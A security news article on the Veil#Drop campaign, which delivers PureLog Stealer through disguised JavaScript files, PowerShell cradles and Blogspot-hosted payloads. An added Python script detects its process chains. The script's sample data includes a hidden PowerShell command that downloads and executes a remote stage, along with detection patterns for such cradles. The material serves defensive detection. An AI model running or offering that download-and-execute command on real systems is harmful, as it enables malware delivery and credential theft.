The campaign, tracked as Veil#Drop, begins with a JavaScript file disguised as a document, such as “transcript.pdf.js”. Once opened on a Windows system, the file runs through Windows Script Host and launches PowerShell with execution-policy bypasses enabled. The command then retrieves further payloads from attacker-controlled Blogspot pages, allowing the malicious traffic to blend with ordinary access to Google-owned infrastructure.
Security researchers said the framework loads PureLog Stealer through a chain of PowerShell download cradles, XOR-obfuscated code and .NET reflection, avoiding the need to write a conventional executable file to disk. The final payload is designed to harvest browser credentials, cookies, autofill data, browsing history, cryptocurrency wallet details and system information.
The use of Blogspot marks a notable escalation in the misuse of mainstream cloud and publishing platforms. By staging payloads on a familiar domain, attackers can reduce suspicion and weaken reputation-based blocking. The technique also complicates incident response because defenders may be reluctant to block an entire trusted service without disrupting legitimate users.
Veil#Drop relies heavily on native Windows tools. The initial JavaScript launcher spawns PowerShell, which retrieves and executes code in memory. Later stages reconstruct encrypted .NET assemblies at runtime and load them through reflection. The framework also includes fallback execution through Microsoft-signed utilities such as RegSvcs, InstallUtil, MSBuild, CSC, VBC and AspNet_Compiler, a tactic often described as “living off the land” because it uses legitimate binaries already present on the system.
The campaign’s social-engineering component remains central to its success. Attackers use double extensions and document-themed names to exploit the way many Windows systems hide known file extensions by default. A victim may see what appears to be a PDF, while the operating system executes a JavaScript file. The approach does not require a software vulnerability; it relies on trust, routine office behaviour and poor visibility into file types.
PureLog Stealer has become a persistent presence in credential-theft campaigns over the past year. Earlier operations used copyright complaint lures, invoice themes, purchase-order messages and malicious archives to push PureLogs variants at organisations and individuals. Other delivery chains have used encrypted payloads hidden inside image files, process hollowing and PowerShell-based loaders to evade static inspection.
The malware family is valued by criminals because stolen browser cookies and session tokens can bypass some multi-factor authentication protections. Once a session token is taken from an infected device, attackers may be able to access cloud email, business applications or cryptocurrency accounts without needing the victim’s password again. That risk is especially acute for finance teams, media organisations, government offices and small businesses that rely heavily on browser-based services.
The campaign also reflects a broader shift away from noisy malware droppers towards modular infection chains. Rather than placing a full malicious executable on the endpoint, attackers use small launchers, trusted services, encrypted blobs and memory-only execution. Each stage performs a narrow task, making detection harder and giving operators room to update infrastructure quickly if a domain or payload is blocked.
For defenders, the case highlights the limits of signature-based antivirus tools. Useful warning signs include unusual parent-child process chains such as wscript.exe launching powershell.exe, PowerShell using Invoke-RestMethod or Invoke-Expression to fetch remote content, encoded command execution, unexplained access to Blogspot URLs from endpoints, and .NET assemblies being loaded directly into memory. Monitoring trusted Microsoft utilities for abnormal execution is also becoming more important as attackers increasingly use them as fallback launch paths.
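Detection logic for the process-chain and command-line warning signs listed above, as an added example that is not from the original article or the researchers' tooling: it runs over constructed Sysmon-style process-creation events (the field names, file paths and the blogspot hostname are assumptions) and returns which indicators each event triggers.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1-style fields), not real telemetry.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Reports"},          # benign admin use
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -ep bypass -w hidden -c "irm https://example-lure.blogspot.com/stage2.txt | iex"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": "MSBuild.exe C:\\Users\\Public\\build.xml"},                              # fallback LOLBin path
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Signed utilities the article names as fallback launch paths; a PowerShell parent is the abnormal part.
LOLBINS = {"regsvcs.exe", "installutil.exe", "msbuild.exe", "csc.exe", "vbc.exe", "aspnet_compiler.exe"}

# Command-line indicators; each rule name is what the triage output reports.
RULES = [
    ("execution_policy_bypass", re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.I)),
    ("download_cradle", re.compile(r"\b(?:invoke-restmethod|irm|invoke-webrequest|iwr|invoke-expression|iex)\b", re.I)),
    ("blogspot_url", re.compile(r"https?://\S*blogspot\.com", re.I)),
    ("encoded_command", re.compile(r"-(?:enc|encodedcommand)\b", re.I)),
    ("reflective_load", re.compile(r"reflection\.assembly\]?::load", re.I)),
]

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def indicators(evt):
    """Return the list of indicator names an event triggers (process chain first, then command line)."""
    hits = []
    parent, image = basename(evt["parent"]), basename(evt["image"])
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    if parent == "powershell.exe" and image in LOLBINS:
        hits.append("powershell_spawns_lolbin")
    hits.extend(name for name, rx in RULES if rx.search(evt["cmd"]))
    return hits

def triage(events, min_hits=1):
    """Return (command line, hits) for every event with at least min_hits indicators."""
    flagged = []
    for evt in events:
        hits = indicators(evt)
        if len(hits) >= min_hits:
            flagged.append((evt["cmd"], hits))
    return flagged

if __name__ == "__main__":
    for cmd, hits in triage(EVENTS):
        print(f"{', '.join(hits)}\n    {cmd}")
```

Raising `min_hits` to 2 keeps the script-host chain with its download cradle while dropping single-indicator events such as the MSBuild launch, which is the usual trade-off between coverage and alert volume.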
The practical response is less about blocking one platform and more about tightening execution controls. Organisations can reduce exposure by showing file extensions by default, restricting Windows Script Host where it is not required, applying PowerShell logging and constrained language mode, monitoring command-line activity, limiting outbound traffic from user endpoints, and using behavioural detection capable of flagging memory-only malware chains.